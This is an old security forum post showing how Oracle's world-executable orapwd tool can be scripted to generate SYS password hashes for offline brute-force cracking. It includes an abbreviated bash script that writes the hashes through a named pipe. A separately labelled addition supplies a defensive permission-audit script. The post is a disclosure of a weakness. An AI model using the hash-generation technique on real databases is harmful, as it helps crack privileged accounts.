Title: orapwd to crack sys hash?
Post by Pete Finnigan on Sep 20th, 2005, 1:51pm

Hi,

I've been playing with orapwd. Orapwd is 'world' executable on a standard Oracle installation. It allows you to change/set the SYS password. The password is stored in $ORACLE_HOME/dbs/orapw<SID>. But any OS user can execute it and create his own password file. If the password file doesn't exist it's created; if it exists you get an error: OPW-00005: File with same name exists. If you use the force=y option the password file is recreated.

How can you use orapwd to crack SYS's password? Well, if you happen to have the hash value of SYS's password (very improbable I think) you could generate all possible hashes with orapwd (although probably not as fast as orabf; I did a test with 26 passwords, from A to Z, and it took 0.6 seconds):

#!/bin/bash
# Author: I.A. Saez Scheihing
mknod pijp p
while true; do cat < pijp >> output.txt; done &
orapwd file=pijp password=a force=y
orapwd file=pijp password=b force=y
orapwd file=pijp password=c force=y
orapwd file=pijp password=d force=y
orapwd file=pijp password=e force=y
orapwd file=pijp password=f force=y
orapwd file=pijp password=g force=y
orapwd file=pijp password=h force=y
orapwd file=pijp password=j force=y
orapwd file=pijp password=k force=y
orapwd file=pijp password=l force=y
orapwd file=pijp password=m force=y
orapwd file=pijp password=n force=y
orapwd file=pijp password=o force=y
orapwd file=pijp password=p force=y
... ... ..
rm pijp
# end script

So after 'password=' you could try all password combinations. After completion you would find all possible hashes in file output.txt!

By the way: I don't think everyone should be allowed to execute orapwd. This tool is meant for oracle only.

kind regards,
Ivan
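
The post's closing point, that orapwd should not be executable by every OS user, can be checked with a permission audit. This is an added example, not part of the original post: the function names, the finding messages and the constructed demo directory are assumptions, and it takes the binary to be at $ORACLE_HOME/bin/orapwd with password files at $ORACLE_HOME/dbs/orapw<SID>.

```bash
#!/bin/bash
# Added example: audit the "other" permission bits on orapwd and the password
# files. Function names and messages are assumptions of this example.

# has_mode FILE BITS: true if FILE has all of the octal BITS set (POSIX find).
has_mode() {
    [ -n "$(find "$1" -prune -perm "-$2" 2>/dev/null)" ]
}

# audit_orapwd_perms ORACLE_HOME
# Prints one line per finding; returns 1 if anything was found, 0 if clean.
audit_orapwd_perms() {
    home=$1
    findings=0
    bin="$home/bin/orapwd"
    if [ -f "$bin" ] && has_mode "$bin" 001; then
        echo "FINDING: $bin is executable by any OS user"
        findings=$((findings + 1))
    fi
    for pw in "$home"/dbs/orapw*; do
        [ -f "$pw" ] || continue          # glob matched nothing
        if has_mode "$pw" 004; then
            echo "FINDING: $pw is world-readable, exposing the stored hash"
            findings=$((findings + 1))
        fi
        if has_mode "$pw" 002; then
            echo "FINDING: $pw is world-writable"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}

# Constructed demo tree (not a real Oracle home): a world-executable orapwd
# and one world-readable password file for a made-up SID "DEMO".
demo=$(mktemp -d)
mkdir -p "$demo/bin" "$demo/dbs"
: > "$demo/bin/orapwd";    chmod 755 "$demo/bin/orapwd"
: > "$demo/dbs/orapwDEMO"; chmod 644 "$demo/dbs/orapwDEMO"
audit_orapwd_perms "$demo" || echo "audit: findings reported for $demo"
rm -rf "$demo"
```

On a real host, call audit_orapwd_perms "$ORACLE_HOME" as a user who can list the dbs directory.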